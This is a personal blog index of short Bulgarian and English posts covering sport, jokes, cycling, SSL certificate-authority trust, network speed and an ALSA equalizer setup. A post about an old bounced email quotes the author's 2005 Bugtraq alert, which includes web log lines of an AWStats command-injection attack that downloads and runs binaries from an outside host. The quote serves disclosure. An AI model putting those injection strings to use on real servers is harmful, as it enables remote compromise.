Home
Шкембе
Author: Делян Кръстев
И тая година ситуацията не е добре. Кантара сочи към 83 кила. Шкембето е достигнало невиждани издатини.
all star 2012
Author: Делян Кръстев
Мач на звездите 2012
Краткия ми коментар
- Имаше едно момче, което изглеждаше с добра техника - Станислав Говедаров.
- По странна стрелба от на Мартин Дурчев сякаш че не съм виждал. Не само на мач на звездите, ами и от децата дето хвърлят по площадките.
- Мача беше нагласен да свърши равен, да няма обиден от главните спонсори - Турски прави криви и успоредни авио линии и Тойота ..
- Родман не знам с кво го изнервиха, ама беше там колкото да отчете присъствие. Толкоз ли нямаше барем една от красивите български жени да му пратят да му врътне един хубав минет, да му вдигне настроението и да направи малко шоу човека.
- Не следя вътрешното първенство.
- Нивото на играчите изглежда доста ниско ..
- Тодор Стойков залезе ..
Лазаров ден
Author: Делян Кръстев
На ЛазЕров ден Дарт Вейдър открил лазерния меч и .. си отрязъл ръката. После видял, че лазера е нещо добро и си направил операция да си я сложи обратно. Уви, само лазера и силата, която го съпътствала не били достатъчни за да се справи с тежката задача само с една ръка. Казал си:
Силата е сила, но за хирург се учи по 10 години ..
Изгасил меча, помирисал отрязаното до лакета парче ръка, хвърлил го на изгладнялото куче, което гледало ръката и се облизвало. Тогава казал:
Да ти е сладко ..
Delivery failure notice for a 7 year old message
Author: Делян Кръстев
Yesterday I have received a delivery failure notice for a message which I have sent over 7 years ago!
Here is the message in its entirety:
Return-Path: <>
Delivered-To: krustev.net-krustev@krustev.net
Received: (qmail 18822 invoked from network); 24 Mar 2012 23:40:23 -0000
Received: from osaka.tehbass.nl (HELO osaka.tehbass.nl) (141.105.120.64)
by home.krustev.net (qpsmtpd/0.84) with ESMTP; Sun, 25 Mar 2012 01:40:23 +0200
X-Bad-Reverse-DNS: no (dnsname - 'osaka.tehbass.nl', dnsip - '141.105.120.64')
Received: by osaka.tehbass.nl (Postfix)
id 27D574C6C9; Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Date: Sun, 25 Mar 2012 00:40:52 +0100 (CET)
From: MAILER-DAEMON@osaka.tehbass.nl (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: krustev@krustev.net
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report;
report-type=delivery-status;
boundary="1A3704C621.1332632452/osaka.tehbass.nl"
Content-Transfer-Encoding: 8bit
Message-Id: <20120324234052.27D574C6C9@osaka.tehbass.nl>
X-Length: 6718
X-UID: 5914
This is a MIME-encapsulated message.
--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Notification
Content-Type: text/plain; charset=us-ascii
This is the mail system at host osaka.tehbass.nl.
I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.
For further assistance, please send mail to postmaster.
If you do so, please include this problem report. You can
delete your own text from the attached returned message.
The mail system
<sjm@localhost.tehbass.nl> (expanded from <sjm@localhost>): cannot update
mailbox /var/spool/mail/sjm for user sjm. error writing message: File too
large
--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Delivery report
Content-Type: message/delivery-status
Reporting-MTA: dns; osaka.tehbass.nl
X-Postfix-Queue-ID: 1A3704C621
X-Postfix-Sender: rfc822; krustev@krustev.net
Arrival-Date: Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Final-Recipient: rfc822; sjm@localhost.tehbass.nl
Original-Recipient: rfc822;sjm@localhost
Action: failed
Status: 5.2.2
Diagnostic-Code: x-unix; input/output error
--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit
Return-Path: <krustev@krustev.net>
Received: from osaka.tehbass.nl (localhost [127.0.0.1])
by osaka.tehbass.nl (Postfix) with ESMTP id 1A3704C621
for <sjm@localhost>; Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Delivered-To: sjtmulder1981@gmail.com
Received: from gmail-pop.l.google.com [74.125.79.108]
by osaka.tehbass.nl with POP3 (fetchmail-6.3.21)
for <sjm@localhost> (single-drop); Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Received: by 10.216.80.104 with SMTP id j82cs110797wee;
Mon, 3 May 2010 01:21:44 -0700 (PDT)
Received: by 10.216.173.69 with SMTP id u47mr5747536wel.227.1272874451923;
Mon, 03 May 2010 01:14:11 -0700 (PDT)
Received-SPF: neutral (google.com: 213.19.161.176 is neither permitted nor denied by best guess record for domain of pop.vevida.com) client-ip=213.19.161.176;
Received: by 10.241.241.82 with POP3 id 18mf39140wwb.56;
Mon, 03 May 2010 01:14:11 -0700 (PDT)
X-Gmail-Fetch-Info: groen@nl-crew.com 1 pop.gmail.com 995 groen@nl-crew.com
Received: from localhost (localhost.localdomain [127.0.0.1])
by lisa2xl.intranet.mens.nl.nu (8.12.11/8.12.11) with ESMTP id j0RLUcXT009387
for <bas@localhost>; Thu, 27 Jan 2005 21:31:14 GMT
Delivered-To: postmaster@aspprojects.nl
Received: from pop.vevida.com [213.19.161.176]
by localhost with POP3 (fetchmail-6.2.5)
for bas@localhost (single-drop); Thu, 27 Jan 2005 21:31:14 +0000 (GMT)
Received: (qmail 32077 invoked by uid 89); 27 Jan 2005 00:46:25 -0000
Delivered-To: aspprojects.nl-sjt@aspprojects.nl
Received: (qmail 32072 invoked by uid 0); 27 Jan 2005 00:46:25 -0000
Received: from frost.nl-crew.com (84.244.131.214)
by net3-nl-mail-04.ad.vevida.net with SMTP; 27 Jan 2005 00:46:25 -0000
Received: from [205.206.231.27] (outgoing.securityfocus.com [205.206.231.27])
by frost.nl-crew.com (Postfix) with ESMTP id 5AB8468492
for <bugtrack@mrgreen.eu.org>; Thu, 27 Jan 2005 01:45:28 +0000 (GMT)
Received: from no.name.available by [205.206.231.27]
via smtpd (for [84.244.131.214] [84.244.131.214]) with ESMTP; Wed, 26 Jan 2005 16:46:24 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 27D2323728F; Wed, 26 Jan 2005 16:14:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3685 invoked from network); 26 Jan 2005 12:59:54 -0000
Content-Type: text/plain;
charset="iso-8859-1"
From: Delian Krustev <krustev@krustev.net>
To: bugtraq@securityfocus.com,
full-disclosure@lists.netsys.com,
security-alerts@linuxsecurity.com
Subject: Re: [ GLSA 200501-36 ] AWStats: Remote code execution
Date: Wed, 26 Jan 2005 20:31:51 +0200
User-Agent: KMail/1.4.3
References: <20050125201313.GA8733@tomservo.ne1.client2.attbi.c>
In-Reply-To: <20050125201313.GA8733@tomservo.ne1.client2.attbi.c>
MIME-Version: 1.0
Message-Id: <200501262031.51944.krustev@krustev.net>
X-Spam-Status: No, hits=0.0 required=5.0, tests=none, version=3.0.2
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by lisa2xl.intranet.mens.nl.nu id j0RLUcXT009387
Status: RO
X-Status:
X-Keywords:
X-UID: 3728
There's an exploit in the wild. Here's what it does:
200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
I don't have the time to investigate the "cgi" and "dc" binaries.
The "cgi" at least tries to daemonize and opens a TCP listening socket.
They also try to replace the index page on the vulnerable site.
--1A3704C621.1332632452/osaka.tehbass.nl--
Открих сезона на колелото
Author: Делян Кръстев
Днес изкарах колелото за сефте тая година. Сутринта започнах с пролетно почистване на детската площадка до блока. След това повъртях педалите до младост. Достатъчно топло беше за по тениска. Но май ще се прибирам с метрото довечера, че вечерите са си хладни още ..
Радва ме, че от рано са наизлезли колоездачи тая година. Може би малко по малко ще започнем да се усещаме колко е удобен и здравословен този транспорт :-)
debian package updates
Author: Делян Кръстев
Еее, тва на нищо не прилича. Няма и четири седмици от както не съм си ъпдейтвал десктопа и ме чакат 530 пакета за ъпгрейд ..
--- Upgradable Packages (530)
--- Installed Packages (1099)
--- Not Installed Packages (39151)
--- Obsolete and Locally Created Packages (22)
--- Virtual Packages (7094)
--- Tasks (727)протест
Author: Делян Кръстев
Търся един човек, който да ме подкрепи за протест пред парламента. Исканията ни ще са:
- Паричните потоци в държавата да излезнат на светло. Всеки месец да се знае колко пари са получени, към къде са разпределени.
- Мажоритарен вот - край на политическите партии. Депутатите ще се избират пряко от народа, и ще могат да бъдат отзовавани по всяко време.
Ще се разберем кога ще протестираме. Ще си направим табели. Първо почваме да протестираме. После търсим още съпричастни към идеята.
Update: 2012-03-24 Все още го търся тоя човек. Никой не се е обадил. Майката му е в редовното протестиране. Може за кратко, но редовно :-)
SSL authorities must not be trusted
Author: Делян Кръстев
Why SSL authorities must not be trusted ?
I have recently read this article:
Trustwave admits issuing man-in-the-middle digital certificate; Mozilla debates punishment
Trustware is one of the Certificate Authorities (CA) which has four certificates included in the Mozilla's trust chain. Mozilla's trust chain is used by most web browsers and most of the software using SSL verification and encryption.
What the article says is that Trustwave has issued an intermediate CA certificate to a third party company. Such certificate could be used for on the fly certificate generation, and thus sniffing SSL traffic. Furthermore Trustwave have called this common industry practice.
For the end user this means that the green bar in the browsers' address bars does not guarantee that they are actually speaking to the website which URL is written there. This also makes the used encryption useless.
147 CA certificates are included in the Mozilla trust chain. This is how they are distributed by country:
56 C=US,
7 C=HU,
6 C=ES,
6 C=DE,
5 C=TR,
5 C=JP,
5 C=GB,
4 C=SE,
4 C=FR,
4 C=EU,
4 C=CH,
3 C=TW,
3 C=IL,
3 C=BM,
2 C=ZA,
2 C=PL,
2 C=NO,
2 C=NL,
2 C=FI,
2 C=DK,
1 C=SK,
1 C=RO,
1 C=IE,
1 C=HK,
1 C=GR,
1 C=EE,
1 C=CO,
1 C=CN,
1 C=ch,
1 C=BE,
1 C=AT,Some of them do not have a country specified:
O=Cybertrust, Inc, CN=Cybertrust Global Root
O=Digital Signature Trust Co., CN=DST Root CA X3
O=Entrust.net, OU=www.entrust.net/CPS_2048 incorp. by ref. (limits liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net Certification Authority (2048)
OU=GlobalSign Root CA - R2, O=GlobalSign, CN=GlobalSign
OU=GlobalSign Root CA - R3, O=GlobalSign, CN=GlobalSign
L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 3 Policy Validation Authority, CN=http://www.valicert.com//emailAddress=info@valicert.com
O=RSA Security Inc, OU=RSA Security 2048 V3
L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 1 Policy Validation Authority, CN=http://www.valicert.com//emailAddress=info@valicert.com
L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 2 Policy Validation Authority, CN=http://www.valicert.com//emailAddress=info@valicert.comIf we look at the Organization tag, we will see that these certificates have been issued by 83 different organizations:
12 O=VeriSign, Inc.
7 O=GeoTrust Inc.
4 O=TC TrustCenter GmbH
4 O=NetLock Halozatbiztonsagi Kft.
4 O=AffirmTrust
4 O=AddTrust AB
3 O=ValiCert, Inc.
3 O=The USERTRUST Network
3 O=thawte, Inc.
3 O=SwissSign AG
3 O=Starfield Technologies, Inc.
3 O=QuoVadis Limited
3 O=Digital Signature Trust Co.
3 O=DigiCert Inc
3 O=Comodo CA Limited
2 O=Thawte Consulting cc
2 O=Staat der Nederlanden
2 O=Sonera
2 O=SecureTrust Corporation
2 O=SECOM Trust Systems CO.,LTD.
2 O=Microsec Ltd.
2 O=GlobalSign
2 O=Equifax Secure Inc.
2 O=Entrust.net
2 O=ComSign
2 O=COMODO CA Limited
2 O=Buypass AS-983163327
2 O=America Online Inc.
2 O=AC Camerfirma SA CIF A82743287
2 O=AC Camerfirma S.A.
1 O=XRamp Security Services Inc
1 O=WISeKey
1 O=Wells Fargo WellsSecure
1 O=Wells Fargo
1 O=VISA
1 O=Unizeto Technologies S.A.
1 O=Unizeto Sp. z o.o.
1 O=T\xC3\xBCrkiye Bilimsel ve Teknolojik Ara\xC5\x9Ft\xC4\xB1rma Kurumu - T\xC3\x9CB\xC4\xB0TAK
1 O=T\xC3\x9CRKTRUST Bilgi \xC4\xB0leti\xC5\x9Fim ve Bili\xC5\x9Fim G\xC3\xBCvenli\xC4\x9Fi Hizmetleri A.\xC5\x9E. (c) Kas\xC4\xB1m 2005
1 O=The Go Daddy Group, Inc.
1 O=TDC Internet
1 O=TDC
1 O=TAIWAN-CA
1 O=Swisscom
1 O=StartCom Ltd.
1 O=Sociedad Cameral de Certificaci\xC3\xB3n Digital - Certic\xC3\xA1mara S.A.
1 O=SECOM Trust.net
1 O=RSA Security Inc
1 O=PM/SGDN
1 O=Network Solutions L.L.C.
1 O=NetLock Kft.
1 O=Japanese Government
1 O=Japan Certification Services, Inc.
1 O=IZENPE S.A.
1 O=Hongkong Post
1 O=Hellenic Academic and Research Institutions Cert. Authority
1 O=GTE Corporation
1 O=Government Root Certification Authority
1 O=GoDaddy.com, Inc.
1 O=GlobalSign nv-sa
1 O=Generalitat Valenciana
1 O=Equifax Secure
1 O=Equifax
1 O=Entrust, Inc.
1 O=Elektronik Bilgi Guvenligi A.S.
1 O=EDICOM
1 O=EBG Bili\xC5\x9Fim Teknolojileri ve Hizmetleri A.\xC5\x9E.
1 O=Disig a.s.
1 O=Digital Signature Trust
1 O=Dhimyotis
1 O=Deutsche Telekom AG
1 O=Deutscher Sparkassen Verlag GmbH
1 O=Cybertrust, Inc
1 O=CNNIC
1 O=Chunghwa Telecom Co., Ltd.
1 O=certSIGN
1 O=Certplus
1 O=Certinomis
1 O=(c) 2005 T\xC3\x9CRKTRUST Bilgi \xC4\xB0leti\xC5\x9Fim ve Bili\xC5\x9Fim G\xC3\xBCvenli\xC4\x9Fi Hizmetleri A.\xC5\x9E.
1 O=Baltimore
1 O=A-Trust Ges. f. Sicherheitssysteme im elektr. Datenverkehr GmbH
1 O=AS Sertifitseerimiskeskus
1 O=Agencia Catalana de Certificacio (NIF Q-0801176-I)By using the Mozilla trust chain we trust all these organizations. All of them have the power to sniff SSL traffic. All of them have the power to delegate the sniffing power to anyone else. This is not news to anyone who was paying attention. What is news, at least to me, is that they have admitted to actually do this bad practice.
All this shows how the most common trust model in the web is broken.
What can be done if we want to use encryption or URL verification ?
One option is to carefully choose the trust chain that we use. However this is not doable on global/Internet scale.
Another option has been provided by Dan Bernstein. He invented and proposed new encryption functions and protocols for the web:
- http://curvecp.org/
- http://dnscurve.org/
- http://www.linux-bg.org/cgi-bin/y/index.pl?page=article&id=advices&key=441401395 (CurveCP/DNSCurve description in Bulgarian)
Hopefully it will be widely accepted.
P.S. Here's an example command I've used to get certificate statistics:
cat /usr/share/ca-certificates/mozilla/* | \
perl -we 'my $F; while(<>) { m/BEGIN / and open($F, "|openssl x509 -text"); print $F $_ }' | \
egrep 'Subject:' | \
perl -wne 'my @a = m/(\w+\=.+?)(?=(?:, \w+\=|$))/g; print "$_\n" foreach grep(/^O=/, @a);' | \
sort | \
uniq -c | \
sort -rnNet speed in Bulgaria
Author: Делян Кръстев
Options:
======================================================= <-- (-) page 1/2 (+) --> =
Window length for average (s): 300
Max Incoming deflection (kBit/s): 100000
Max Outgoing deflection (kBit/s): 100000
Unit for data numbers: Human Readable (Byte)
Device eth0 [85.11.178.49] (1/1):
==================================================================================
Incoming:
... ... ..|..... .
####||##############|.. .|#... ... . ..|||
###############################|||.....|############## Curr: 63.80 MBit/s
###################################################### Avg: 57.86 MBit/s
###################################################### Min: 46.76 MBit/s
###################################################### Max: 73.52 MBit/s
###################################################### Ttl: 3.92 GByte
Outgoing:
Curr: 2.80 MBit/s
Avg: 2.43 MBit/s
Min: 1.99 MBit/s
Max: 2.92 MBit/s
Ttl: 221.43 MByteDownloading 2 torrent files. Avg download speed about 60 Mbits.
Internet service provider: TV Net (former Sofia Cable Company).
Paying 33 BGL(about USD 20) monthly for a package - internet + analog TV(80 channels).
Global equalizer for ALSA
Author: Делян Кръстев
Ever wondered how to have a system global equalizer for ALSA ?! Once I wondered too. Now I know.
1.Non real-time
One option is to use LADSPA:
$ sudo apt-get install caps
$ cat ~/.asoundrc
pcm.!default {
type plug
slave.pcm "equalized";
}
pcm.equalized {
type ladspa
slave.pcm "plug:dmix";
path "/usr/lib/ladspa";
plugins [
{
id 1773
input {
controls [ -5 -5 -5 -5 -5 -5 1 3 7 1 ]
}
}
]
}Unfortunately this does not allow on-the-fly mixer level adjustments and you have to edit ~/.asoundrc and restart all processes which you want to use the adjusted mixer levels.
2.Real-time !
Recently I found another option though. It supports real-time equalizer adjustments:
$ sudo apt-get install libasound2-plugin-equal
$ cat ~/.asoundrc
pcm.!default {
type plug
slave.pcm "plugequal";
}
ctl.equal {
type equal;
}
pcm.plugequal {
type equal;
slave.pcm "plug:dmix";
}
$ alsamixer -D equal
$ alsamixergui -D equal
Just a reminder. The default levels are: 25 for 31HZ(leftmost) and 66 for all the rest.
The levels could be reset by deleting ~/.alsaequal.bin . Doing this manually requires a restart of the processes that used it.
References:
![[Atom Feed]](/i/atom.png){kind=small}